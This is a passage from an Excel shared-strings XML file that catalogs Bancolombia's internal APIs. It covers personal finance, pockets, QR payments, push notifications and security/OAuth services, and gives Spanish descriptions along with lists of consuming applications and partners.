 CGC_NU0014001 _x000D_
 Tabot_AW1165001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 APP-PERSONAS_NU0146001</t>
  </si>
  <si>
    <t>Esta API está orientada al seguimiento administrativo del módulo de FINANZAS PERSONALES de los clientes del banco. Permitiendo controlar y tener registro de todas las actividades realizadas por los clientes en los distintos módulos.</t>
  </si>
  <si>
    <t>Personal Finance - Budget</t>
  </si>
  <si>
    <t>personal-finance-budget</t>
  </si>
  <si>
    <t>Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de su presupuesto. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder guardar el presupuesto de gastos, ingresos y ahorros de un mes y un periodo de tiempo que determine. A este presupuesto mes a mes, o segíºn se desee, puede ser modificado, y ajustar segíºn los planes financieros de cada cliente.</t>
  </si>
  <si>
    <t>Personal finance  Cash - Management</t>
  </si>
  <si>
    <t>personal-finance-cash-management</t>
  </si>
  <si>
    <t>Personal Finance - Cash Management</t>
  </si>
  <si>
    <t>Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de su efectivo. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para tener registro de los movimientos de efectivo que haga el cliente, tales como: creación, actualización y modificación de las transacciones en efectivo. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente.</t>
  </si>
  <si>
    <t>Personal finance  CreditCard - Management</t>
  </si>
  <si>
    <t>personal-finance-creditcard-management</t>
  </si>
  <si>
    <t>Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de sus gastos, realizados a través de su(s) tarjetas de crédito. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorías de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente.</t>
  </si>
  <si>
    <t>Personal Finance - CreditCard Management</t>
  </si>
  <si>
    <t>Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de sus gastos, realizados a través de su(s) tarjetas de crédito. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorí­as de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente.</t>
  </si>
  <si>
    <t>Personal finance  Expenses - Management</t>
  </si>
  <si>
    <t>personal-finance-expenses-management</t>
  </si>
  <si>
    <t>Personal Finance - Expenses Management</t>
  </si>
  <si>
    <t>Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de sus gastos. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorí­as de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente.</t>
  </si>
  <si>
    <t>Personal finance  Incomes - Management</t>
  </si>
  <si>
    <t>personal-finance-incomes-management</t>
  </si>
  <si>
    <t>Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de su efectivo. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para tener registro de los movimientos de efectivo que haga el cliente, tales como: creación, actualización y modificación de las transacciones en efectivo. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente.</t>
  </si>
  <si>
    <t>Personal Finance - Incomes Management</t>
  </si>
  <si>
    <t>Personal Finance - Reports</t>
  </si>
  <si>
    <t>personal-finance-reports</t>
  </si>
  <si>
    <t>Esta API está orientada a la reporteria general de las finanzas personales. Permitiendo consultas valores generales, como el estado actual de las finanzas: total de gastos, total de ingresos, total de gastos con tarjetas de crédito, entre otros.</t>
  </si>
  <si>
    <t>Personal finance  Terms</t>
  </si>
  <si>
    <t>personal-finance-terms</t>
  </si>
  <si>
    <t xml:space="preserve">Esta API está orientada a la administración de los términos y condiciones que rige al módulo de finanzas personales. Controlando la versión actual y el histórico de versiones que tiene el módulo.   
De igual manera, se puede hacer registro y la consulta de los clientes que han aceptado los términos y condiciones para el uso de las finanzas personales en los distintos canales del banco. </t>
  </si>
  <si>
    <t>Personal Finance - Terms</t>
  </si>
  <si>
    <t>Esta API está orientada a la administración de los términos y condiciones que rige al módulo de finanzas personales. Controlando la versión actual y el histórico de versiones que tiene el módulo.  De igual manera, se puede hacer registro y la consulta de los clientes que han aceptado los términos y condiciones para el uso de las finanzas personales en los distintos canales del banco.</t>
  </si>
  <si>
    <t>PG_IC_GESTIONCODIGOAUTORIZACION_GCU</t>
  </si>
  <si>
    <t>Physical Point Network</t>
  </si>
  <si>
    <t>Physical Point Network - Service Points</t>
  </si>
  <si>
    <t>physical-point-network-service-points</t>
  </si>
  <si>
    <t xml:space="preserve">La API Service points tiene el objetivo de consultar los puntos fí­sicos de Bancolombia, como lo son sucursales,  corresponsales bancarios y cajeros electrónicos.    La consulta a los puntos fí­sicos se debe hacer por la latitud, longitud y radio del cliente ya sea de su ubicación en tiempo real o de la ubicación que el desee; con esto podemos obtener información de ubicación y que servicios prestan cada uno de los puntos./ </t>
  </si>
  <si>
    <t>ALM_AW0955001</t>
  </si>
  <si>
    <t>Pockets</t>
  </si>
  <si>
    <t>Pocket - Information</t>
  </si>
  <si>
    <t>pocket-information</t>
  </si>
  <si>
    <t>Habilita las capacidades de consulta de bolsillos como listar las diferentes categorí­as por las cuales se puede separar el dinero, consultar los bolsillos de una cuenta en especí­fico, consultar el detalle de un bolsillo.</t>
  </si>
  <si>
    <t>ConsultaInformacionBolsillos/V1.0</t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR _x000D_
 PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 BC_Monitoreo_ProductorConsumidor_Depositos _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 CGC_NU0014001 _x000D_
 APP-PERSONAS_NU0146001</t>
  </si>
  <si>
    <t>Pocket - Management</t>
  </si>
  <si>
    <t>pocket-management</t>
  </si>
  <si>
    <t>Habilita las capacidades de gestión sobre los bolsillos de una cuenta de ahorro, como su creación o cancelación, por ejemplo.</t>
  </si>
  <si>
    <t>GestionDeBolsillos/V1.0</t>
  </si>
  <si>
    <t>Pocket - Transactions</t>
  </si>
  <si>
    <t>pocket-transactions</t>
  </si>
  <si>
    <t>Habilita las capacidades de consulta relacionada con los movimientos que puede tener un bolsillo en particular, por ejemplo, adiciones, retiros o transferencias.</t>
  </si>
  <si>
    <t>ConsultaMovimientosBolsillos/V1.0</t>
  </si>
  <si>
    <t>Pocket - Transfers</t>
  </si>
  <si>
    <t>pocket-transfers</t>
  </si>
  <si>
    <t>Habilita las capacidades monetarias, como abonos, retiros y transferencias a los bolsillos de una cuenta.</t>
  </si>
  <si>
    <t>TransferenciasDeBolsillos/V1.0</t>
  </si>
  <si>
    <t>Point Of Services</t>
  </si>
  <si>
    <t>Point Of Services - Shift Information</t>
  </si>
  <si>
    <t>point-of-service-shift-information</t>
  </si>
  <si>
    <t xml:space="preserve">La API shift information tiene el objetivo de entregar información para las siguientes consultas  Consultar el identificador de un cliente y no cliente banco Consultar los servicios que prestan las sucursales </t>
  </si>
  <si>
    <t>Predictor Ingresos</t>
  </si>
  <si>
    <t xml:space="preserve">El objetivo del servicio es consultar los datos de los 6 últimos meses de los ingresos del cliente, producto de su nómina y/o pensión recibida en cuentas de depósitos de Bancolombia para ser procesada en solicitudes de crédito de vivienda. </t>
  </si>
  <si>
    <t>Pagos automáticos Bancolombia - PAB_ISPAB0001</t>
  </si>
  <si>
    <t>Preliminary Study</t>
  </si>
  <si>
    <t>preliminary-study</t>
  </si>
  <si>
    <t>El proceso de Estudio Preliminar, permite el registro de la información de los datos básicos del cliente, actividad económica, datos del vehí­culo y datos propios del comercio para realizar la ejecución del estudio preliminar para el crédito de véhiculo y obtener una aprobación parcial y permitir continuar con el proceso final del estudio.</t>
  </si>
  <si>
    <t>Procesamiento Archivos Depositos</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio permite notificar a depósitos que se le envió un archivo para que lo procese. </t>
  </si>
  <si>
    <t>AW01065 _x000D_
SUF _x000D_
AFC _x000D_
NU0001 _x000D_
AW1078 _x000D_
AW1110001</t>
  </si>
  <si>
    <t>Push Notifications</t>
  </si>
  <si>
    <t>Push Notifications - Customer Information</t>
  </si>
  <si>
    <t>push-notifications-customer-information</t>
  </si>
  <si>
    <t>Notificaciones Push (Push Notifications) hace referencia a los mensajes instantáneos que se entregan al usuario en su teléfono inteligente, por lo cual el usuario dependerá de tener siempre Internet para recibir los mismos. Su proveedor será IBM Cloud.     Esta API tiene como función, permitir a las APPs consumidoras de los servicios de Push, confirmar si un usuario ya está enrolado, desde que APP se enroló y desde que dispositivo. Esto con el fin de poder validar si debe hacerse enrolamiento o cambio de dispositivo.</t>
  </si>
  <si>
    <t>APP-PERSONAS_NU0146001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Push Notifications - Customer Management</t>
  </si>
  <si>
    <t>push-notifications-customer-management</t>
  </si>
  <si>
    <t>Notificaciones Push hace referencia a los mensajes instantáneos que se entregan al usuario en su teléfono inteligente, por lo cual el usuario dependerá de tener siempre Internet para recibir los mismos. Su proveedor será IBM Cloud.     Esta API tiene como función administrar el usuario que acepte enrolarse en el sistema de Notificaciones Push de Bancolombia. Para la administración de estos usuarios, inicialmente se podrá guardar los datos del cliente enrolado en el Gestor de Enví­o y más adelante actualizar las categorí­as que un cliente active o inactive desde las diferentes APPs.</t>
  </si>
  <si>
    <t>Push Notifications - Send</t>
  </si>
  <si>
    <t>push-notifications-send</t>
  </si>
  <si>
    <t>Notificaciones Push hace referencia a los mensajes instantáneos que se entregan al usuario en su teléfono inteligente, por lo cual el usuario dependerá de tener siempre Internet para recibir los mismos. Su proveedor será IBM Cloud.     Esta API tiene como función, servir como canal de comunicación con el Gestor de Enví­o. La información necesaria para el enví­o de una notificación Push son el tipo y níºmero de documento y el mensaje.</t>
  </si>
  <si>
    <t>QR Code</t>
  </si>
  <si>
    <t>QR Code - Intention</t>
  </si>
  <si>
    <t>qr-code-intention</t>
  </si>
  <si>
    <t>Esta API permite generar intenciones de compra y cargarlas en códigos QR Mixtos. Las intenciones de compra son paquetes de información que llevan todos los datos de la compra, como el monto, el identificador íºnico de QR, níºmero de venta o níºmeros de fidelidad. Este paquete de información se actualiza en el código QR para que sea leí­do por el cliente pagador.</t>
  </si>
  <si>
    <t>PRAGMA _x000D_
 MonitoreoDCM_AAA _x000D_
 TAXIS SAN JUAN _x000D_
 Zencillo Automatización _x000D_
 A PAGAR V2 _x000D_
 PruebasIntegración _x000D_
 SmartPayment POS EGlobalT _x000D_
 Backend de Taxis Libres App _x000D_
 Propia _x000D_
 BE MOVIL _x000D_
 POS 4.0 _x000D_
 Autocab driver companyon _x000D_
 BAGUER _x000D_
 D y S SAS _x000D_
 PagoCI24 _x000D_
 TAXI TAXI _x000D_
 APP IMPULSADOR _x000D_
 AUTOCAB _x000D_
 RADIO TAXI _x000D_
 AUTOCAB ASISTENTE CONDUCTOR _x000D_
 Tax Andaluz _x000D_
 Payment Gateway controles inteligentes _x000D_
 MOVIVA _x000D_
 Cegid V.2.0 _x000D_
 PTM _x000D_
 zencillo Capturador _x000D_
 TAXIS VERDES _x000D_
 COOPEBOMBASV2</t>
  </si>
  <si>
    <t>QR Code - QR Management</t>
  </si>
  <si>
    <t>QR-Management</t>
  </si>
  <si>
    <t>Capacidad que permite a las aplicaciones de terceros generar un código QR para realizar transferencias. Adicionalmente se notifica la transferencia realizada al contacto de alertas y notificaciones registrado de acuerdo al producto destino de la transferencia.</t>
  </si>
  <si>
    <t>Soycoopebombas _x000D_
 TAXIA LIFE APP _x000D_
 CONDUCTOR TAX INDIVIDUAL _x000D_
 APP TORO AUTOS _x000D_
 SMART ONE _x000D_
 Mis Aliados _x000D_
 LOS MOVILES _x000D_
 Cegid _x000D_
 MOVIVA _x000D_
 AUTOCAB _x000D_
 TAXIS VERDES _x000D_
 322 APP _x000D_
 AUTOCAB ASISTENTE CONDUCTOR _x000D_
 TAXI TAXI _x000D_
 RADIO TAXI _x000D_
 A PAGAR</t>
  </si>
  <si>
    <t>qr-code-qr-management</t>
  </si>
  <si>
    <t>query-customer</t>
  </si>
  <si>
    <t>Query - Corporate - Customer</t>
  </si>
  <si>
    <t>query-corporate-customer</t>
  </si>
  <si>
    <t>La Api Query - Corporate - Customer permite la consulta de información general, información financiera y la información de contactos, accionistas, grupo económico y miembros de junta de una empresa particular sea persona natural o jurí­dica.</t>
  </si>
  <si>
    <t>ConsultaInformacionClienteEmpresarial/V1.0</t>
  </si>
  <si>
    <t>PortalConstructor_AW0360004 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Realizar Operacion Cheque</t>
  </si>
  <si>
    <t>El servicio obtendra las diferentes respuestas sobre la Lista de cheques por Oficina y sobre la actualización del estado del cheque una vez sea autorizada la impresión.</t>
  </si>
  <si>
    <t>SCI _x000D_
AW0709001 _x000D_
AW01010</t>
  </si>
  <si>
    <t>Realizar Operacion Fiduciaria</t>
  </si>
  <si>
    <t>REALIZAR OPERACION FIDUCIARIA</t>
  </si>
  <si>
    <t>Recharges</t>
  </si>
  <si>
    <t>Recharges-Product Balance</t>
  </si>
  <si>
    <t>recharges-product-balance</t>
  </si>
  <si>
    <t>La API permite realizar la consulta de saldos de las recargas de cualquier producto o servicio en particular, por ejemplo: (Transporte, entretenimiento, telefoní­a).</t>
  </si>
  <si>
    <t>ALM_AW0955001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 CGC_NU0014001 _x000D_
 ALM_AW0955</t>
  </si>
  <si>
    <t>APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000D_
 APP-PERSONAS_NU0146001</t>
  </si>
  <si>
    <t>Recharges-Recharges Management</t>
  </si>
  <si>
    <t>recharges-recharges-management</t>
  </si>
  <si>
    <t>La API Recharges,  permite  realizar y consultar las recargas de servicios (Entretenimiento, servicios píºblicos, telefoní­a móvil, TV) realizadas por los diferentes canales del  banco. Dentro de sus operaciones se encuentran:  1.  POST/recharges Capacidad que  permite crear la recarga de un servicio por los distintos canales que ofrece el Banco al Core de Recargas. 2.  POST/Recharges Capacidad que  permite realizar la consulta del estado de la recarga realizada por el cliente Bancolombia.</t>
  </si>
  <si>
    <t>Recuperar Catalogo_BB2</t>
  </si>
  <si>
    <t>El este servicio permite realizar búsqueda de documentos sobre UCM.</t>
  </si>
  <si>
    <t>Catálogo de Documentos BB2_Catálogo de Documentos BB2_AW0931001</t>
  </si>
  <si>
    <t>AW0922 _x000D_
AW0856 _x000D_
AW0998 _x000D_
NU0142001</t>
  </si>
  <si>
    <t>Recuperar Cliente</t>
  </si>
  <si>
    <t>Consulta los datos de un cliente en el HUB de Información, con el fin de verificar la existencia del mismo en el banco</t>
  </si>
  <si>
    <t>AW0718001 _x000D_
AW0611001 _x000D_
AW0709001 _x000D_
AW0683001 _x000D_
AW0628001</t>
  </si>
  <si>
    <t>Recuperar Comisiones Cliente</t>
  </si>
  <si>
    <t>Permitir consultar la información de las Comisiones de los productos Trade (carta de crédito de importación o garantía standby emitidas) ofrecidas por Bancolombia a un Cliente.</t>
  </si>
  <si>
    <t>Recuperar Cuentas Deposito</t>
  </si>
  <si>
    <t>Permite obtener la información de las cuentas de depósito atadas a un número de documento específico.</t>
  </si>
  <si>
    <t>Recuperar Datos Cliente</t>
  </si>
  <si>
    <t>El servicio posibilita a nuevos consumidores o nuevos componentes la consulta de información de clientes.</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW0937 _x000D_
SAI _x000D_
SU2 _x000D_
AW0856 _x000D_
PAC _x000D_
SCI _x000D_
CNB _x000D_
AW0210001 _x000D_
ALM _x000D_
SVP _x000D_
ALL _x000D_
AW0611001 _x000D_
GDE _x000D_
AW0709001 _x000D_
CDE _x000D_
AW1128 _x000D_
AW01010 _x000D_
APP _x000D_
PSE _x000D_
AW1011 _x000D_
SVE _x000D_
ATM _x000D_
AUD _x000D_
FAC _x000D_
AW0360</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW0937 _x000D_
ELIBOM _x000D_
SU2 _x000D_
AW0856 _x000D_
AW1294001 _x000D_
AW1097001 _x000D_
AW0210001 _x000D_
SVP _x000D_
GDE _x000D_
AW1287001 _x000D_
AW1287 _x000D_
AW1078 _x000D_
AW1128 _x000D_
APP _x000D_
AW1011 _x000D_
AW1204001 _x000D_
SVE _x000D_
AW0939001 _x000D_
AW0360009 _x000D_
AW1108001 _x000D_
AW1165 _x000D_
AW1203001 _x000D_
AW1272001 _x000D_
AW1285001 _x000D_
AW1302001 _x000D_
NU0004001 _x000D_
TVP _x000D_
AW1249 _x000D_
AW0638 _x000D_
AW1258002 _x000D_
APIC _x000D_
AW1312001 _x000D_
CDT</t>
  </si>
  <si>
    <t>AW0718001 _x000D_
AW0683001 _x000D_
AW0227001 _x000D_
AW0628001</t>
  </si>
  <si>
    <t>HUB</t>
  </si>
  <si>
    <t>Recuperar Documentos_BB1</t>
  </si>
  <si>
    <t>Permite realizar consultas al interior de la plataforma de gestión documental, de tal forma que se obtiene el enlace en donde se pueden visualizar las imágenes de los documentos previamente almacenados.</t>
  </si>
  <si>
    <t>Consulta de Documentos BB1 V2_AW1216001</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW0922 _x000D_
AW0856 _x000D_
AW1182 _x000D_
AW0611001 _x000D_
AW1128 _x000D_
AW0659</t>
  </si>
  <si>
    <t>Recuperar Filiales</t>
  </si>
  <si>
    <t>se consulta en el HUB de Información los datos respectivos de un tipo y número de identificación para recuperar las filiales de un Cliente.</t>
  </si>
  <si>
    <t>AW0718001 _x000D_
AW0227001</t>
  </si>
  <si>
    <t>Recuperar Id Cliente</t>
  </si>
  <si>
    <t>Realiza consultas por documentos de identificación y IDs de aplicaciones de clientes para obtener las llaves que se requieran de los datos maestros del HUB de información DMR</t>
  </si>
  <si>
    <t>AW0718001 _x000D_
AW0504001 _x000D_
AW0227001 _x000D_
AW0628001 _x000D_
AW0682001</t>
  </si>
  <si>
    <t>Recuperar Producto</t>
  </si>
  <si>
    <t>Realizar la consulta de los productos que un cliente tiene como titular</t>
  </si>
  <si>
    <t>APIC _x000D_
AW0718001 _x000D_
AW0227001</t>
  </si>
  <si>
    <t>Recuperar Tasa Cambio</t>
  </si>
  <si>
    <t>El servicio le proporciona al consumidor el valor de una tasa de cambio dado la moneda origen y destino y la fecha de tasa a consultar.</t>
  </si>
  <si>
    <t>Reference Data Management</t>
  </si>
  <si>
    <t>Reference Data Management - Master Catalogue</t>
  </si>
  <si>
    <t>reference-data-management-master-catalogue</t>
  </si>
  <si>
    <t>API que permite consultar los catálogos de valores de los distintos atributos de los datos de información de cliente. Conteniendo la llave-valor de los códigos y descripciones de los maestros del banco para catalogo personas. (Ejemplo: Cargos, Profesiones del cliente, Segmentos, Tipos de documento, entre otros).</t>
  </si>
  <si>
    <t>ConsultaCatalogoMaestros/V1.0</t>
  </si>
  <si>
    <t>creditlens_NU0038001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 EASYHOME_NU0004001 _x000D_
 ChannelManagement_D2B_NU0051001 _x000D_
 VisorInteractivo_AW1249001 _x000D_
 ChannelManagement_NU0051001 _x000D_
 Galatea_NU0051001</t>
  </si>
  <si>
    <t>Regenerar Clave SVE</t>
  </si>
  <si>
    <t>Registrar Sesion Usuario</t>
  </si>
  <si>
    <t xml:space="preserve">servicio utilizado en el proyecto de transformación digital para la consulta de información de sesión </t>
  </si>
  <si>
    <t>Registro Usuario Validacion Biometrica</t>
  </si>
  <si>
    <t>A través de este servicio se van a registrar en Biovoz los usuarios creados en el Directorio Activo Host to Host para la Unidad Organizativa de Sufi en la cual van a estar matriculados los vendedores de los comercios afiliados y usuarios internos que harán uso de la aplicación ConSufi.</t>
  </si>
  <si>
    <t>Regulatory Compliance</t>
  </si>
  <si>
    <t>Regulatory Compliance - Risk Rating Management SCOVIC</t>
  </si>
  <si>
    <t>regulatory-compliance-risk-raiting-management-scovic</t>
  </si>
  <si>
    <t>Administra la ejecución de los modelos de riesgos SARLAFT,  busca crear un nuevo componente tecnológico (SCOVIC) que administre las reglas de negocio para entregar los diferentes niveles de calificación para los diferentes modelos de vinculación desde los diferentes canales o aplicaciones.</t>
  </si>
  <si>
    <t>SAPCRM_AW0611001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 ALM_AW0955001 _x000D_
 ALM_AW0955 _x000D_
 APM_AW0388001 _x000D_
 ComponenteAdaptadorNequi_NU0163001</t>
  </si>
  <si>
    <t>Sales Product Agreement</t>
  </si>
  <si>
    <t>Sales Product Agreement - Product Information</t>
  </si>
  <si>
    <t>sales-product-agreement-product-information</t>
  </si>
  <si>
    <t>La API permite consultar información actual de su plan y consumo de transacciones por medio de sus canales, en la cual se expondrán, los diferentes atributos que conforman la cuenta de ahorros y/o corrientes que tiene activa un cliente con el banco, información como marcación en el GMF, novedades acerca de su cuenta, cupos de sobregiro, los medios de pago asociados a la cuenta, su respectivo valor de la cuota de manejo, descuentos por convenios de nómina, un gestor de finanzas personales, información general y detallada de todos los beneficios del plan, entre otros.</t>
  </si>
  <si>
    <t>Ecosistemas Clientes</t>
  </si>
  <si>
    <t>GESTION DE PRECIOS_NU0091001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 APP-PERSONAS_NU0146001 _x000D_
 MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>Este servicio expone información de los atributos y beneficios relacionados a los productos de Clientes Bancolombia. Atributos como la marcación del GMF, medios de pago asociados a la cuenta, valor de la cuota de manejo y el detalle relacionado con el cobro, particularidades sobre el tipo de plan e información de los beneficios tanto del tipo de cuenta como del plan, por ejemplo, bolsillos sin costo, canales de retiros, transferencias, descuentos por convenios de nómina, un gestor de finanzas personales e información especí­fica de los beneficios del medio de pago.</t>
  </si>
  <si>
    <t>GESTION DE PRECIOS_NU0091001</t>
  </si>
  <si>
    <t>Second Security Factor</t>
  </si>
  <si>
    <t>Second Security Factor - Information</t>
  </si>
  <si>
    <t>second-security-factor-information</t>
  </si>
  <si>
    <t>El api Second Security Factor - Information permite realizar la consulta del estado de un cliente en DID con base en su tipo y numero de documento.</t>
  </si>
  <si>
    <t>Autenticacion-para-VCAS_NU0101001 _x000D_
 JornadaDepositos_NU0104001 _x000D_
 JornadaDepositos_NU0170001 _x000D_
 CryptoAssetsGMN_NU0094001 _x000D_
 One Click Payment_NU0199001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 PreaprobadosSucursales_AW1299001</t>
  </si>
  <si>
    <t>Second Security Factor - Management</t>
  </si>
  <si>
    <t>second-security-factor-management</t>
  </si>
  <si>
    <t>El api Second Security Factor - Management permite consumir las funcionalidades para generar un segundo fator ya sea OTP o PUSH, y autenticarlo, que significa confirmar su validez para continuar el proceso.</t>
  </si>
  <si>
    <t>Security - Authorization Code</t>
  </si>
  <si>
    <t>security-authorization-code</t>
  </si>
  <si>
    <t>Esta API permite generar un código de autorización con el que posteriormente se puede solicitar un token (sesión) para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Se puede generar usando las credenciales cifradas del cliente, es decir, cuando el Cliente se autentica.  El código de autorización garantiza que un cliente se autenticó de forma exitosa.</t>
  </si>
  <si>
    <t>GenerarCodigoAutorizacionPorToken/V1.0
GestionCodigoAutorizacion/V1.0
GenerarCodigoAutorizacionPorCredenciales/V1.0</t>
  </si>
  <si>
    <t>PEP_AW1281002 _x000D_
 EASYHOME_NU0004001 _x000D_
 SVP_NU0004001 _x000D_
 MovilidadCore_AW1281002 _x000D_
 FUA_AW1291001 _x000D_
 HabitatCore_AW1281003 _x000D_
 HDC_AW0453001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 ALM_AW0955001 _x000D_
 ALM_AW0955 _x000D_
 Networking_NU0046001 _x000D_
 JornadaDepositos_NU0104001 _x000D_
 NETWORKING_NU0046001 _x000D_
 Portal Contenidos Bancolombia_AW1218001 _x000D_
 AdaptadorMarketplace_NU0143001 _x000D_
 EDPYME_AW1170 _x000D_
 CryptoAssetsGMN_NU0094001 _x000D_
 SVECarteraComercial_NU0162001 _x000D_
 JornadaDepositos_NU0170001 _x000D_
 Security_AW1291001 _x000D_
 SVN_NU0212001</t>
  </si>
  <si>
    <t>Portal Contenidos Bancolombia_AW1218001 _x000D_
 NETWORKING_NU0046001 _x000D_
 Kioscos_AW1272001 _x000D_
 EDIN_AW1185001 _x000D_
 CryptoAssetsGMN_NU0094001 _x000D_
 HabitatCore_AW1281003 _x000D_
 MigracionFUA_AW1291001 _x000D_
 PortalAutogestionPyme_AW1287 _x000D_
 LoansOffer_NU0102001 _x000D_
 AdaptadorMarketplace_NU0143001 _x000D_
 MovilidadCore_AW1281002 _x000D_
 SVECarteraComercial_NU0162001 _x000D_
 One Click Payment_NU0199001 _x000D_
 HDC_AW0453001 _x000D_
 Transversal_AW0937001 _x000D_
 EASYHOME_NU0004001 _x000D_
 BancolombiaPay_AW1435001 _x000D_
 SVN_NU0212001 _x000D_
 PEP_AW1281002 _x000D_
 JornadaDepositos_NU0170001 _x000D_
 EDPYME_AW1170 _x000D_
 ALM_AW0955001 _x000D_
 JornadaDepositos_NU0104001 _x000D_
 SVE_AW0360001 _x000D_
 BNPL_NU0287001 _x000D_
 Marketplacetu360HM_NU0035001 _x000D_
 VINCUTRANS_NU0034001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 ModuloNegociosFiduciarios_NU0247001</t>
  </si>
  <si>
    <t>Esta API permite generar un código de autorización con el que posteriormente se puede solicitar un token (sesión) para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Esta operación es conocida como Single Sing On.</t>
  </si>
  <si>
    <t>Security - Code Validation</t>
  </si>
  <si>
    <t>security-code-validation</t>
  </si>
  <si>
    <t>Esta API permite realizar el proceso de autenticación OAuth 2.0 expuesto en WAS, por medio de la verificación de un código de autorización que es previamente generado y posteriormente enviado por el cliente, si el proceso es exitoso genera un access_token con este sistema de autenticación.</t>
  </si>
  <si>
    <t>GestionAutenticacionOAuth2/V1.0</t>
  </si>
  <si>
    <t>Security - Encrypted Key</t>
  </si>
  <si>
    <t>security-encrypted-key</t>
  </si>
  <si>
    <t>Esta API permite entregar a un consumidor la llave o el módulos para posteriormente con este dato realizar el cifrado del pin del cliente</t>
  </si>
  <si>
    <t>GestionLlaveCifrado/V1.0</t>
  </si>
  <si>
    <t>Security - Oauth provider</t>
  </si>
  <si>
    <t>security-oauth-provider</t>
  </si>
  <si>
    <t>Proveedor de Oauth con flujo de aplicación para autenticación de la aplicación cliente que va a consumir las APIs</t>
  </si>
  <si>
    <t>APP Cayman _x000D_
 Cayman_Soporte _x000D_
 TMP EDIN APP_AW1276001 _x000D_
 TEMP MAM_AW1204 _x000D_
 BC_Herramientas_Monitoreo _x000D_
 TMP2 johucorr_AW1185001 _x000D_
 App inversionesGB_AW1185001 _x000D_
 TMP1 johucorr_AW0360010 _x000D_
 APOLO_AW0360010</t>
  </si>
  <si>
    <t>Security - OAuth Provider from OTP</t>
  </si>
  <si>
    <t>Expone los formularios para validar la identidad y autorización del usuario.</t>
  </si>
  <si>
    <t>WorldRemit_WRT _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 Carventuri _x000D_
 Uniteller_UTL _x000D_
 BCHerramientasMonitoreo_AAA _x000D_
 WOMPI _x000D_
 TIGOUNE _x000D_
 Tuya _x000D_
 VIRGINMOBILEAPP _x000D_
 SmallWorld_OMX _x000D_
 Baguer SAS _x000D_
 SERVICIOS DE SALUD IPS SURAMERICANA S.A.S. _x000D_
 OPERACIONES GENERALES SURAMERICANA SAS _x000D_
 SERVICIOS GENERALES SURAMERICANA S.A.S. _x000D_
 CONSULTORIA EN GESTION DE RIESGOS SURAMERICANA _x000D_
 SEGUROS GENERALES SURAMERICANA SA _x000D_
 SEGUROS DE VIDA SURAMERICANA SA _x000D_
 EPS SURAMERICANA S.A. _x000D_
 FONYOU COLOMBIA SAS _x000D_
 INVERSORA EBCO APP _x000D_
 ABC PAGOS _x000D_
 LYRAAPP _x000D_
 CLAROAPP _x000D_
 SUPERPAGOSAPP _x000D_
 ZONA PAGOS _x000D_
 Place to Pay _x000D_
 T atiendo Boton Bancolombia _x000D_
 Boton Bancolombia _x000D_
 E-collect _x000D_
 App_Blendex_BotonBancolombia _x000D_
 ofrendaappbc _x000D_
 ALKOSTO BOTON BANCOLOMBIA _x000D_
 WOMPI APP _x000D_
 COMFAMA APP _x000D_
 SISTECREDITO SAS _x000D_
 PAYMENTEZ APP _x000D_
 FONVALMED</t>
  </si>
  <si>
    <t>Security - OAuth Provider from OTP Pymes</t>
  </si>
  <si>
    <t>Security Access Entitlement</t>
  </si>
  <si>
    <t>Security Access Entitlement - Memberships</t>
  </si>
  <si>
    <t>security-access-entitlement-memberships</t>
  </si>
  <si>
    <t>Esta API permite validar y regenerar el código íºnico de afiliación; este código está relacionado al documento del usuario delegado que se está creando y el cliente. Hace parte del proceso de delegación de acceso a los contenidos y/o funcionalidades de los canales Bancolombia y debe ser exitoso para que se efectíºe la delegación.</t>
  </si>
  <si>
    <t>Security Access Entitlement - Relations</t>
  </si>
  <si>
    <t>security-access-entitlement-relations</t>
  </si>
  <si>
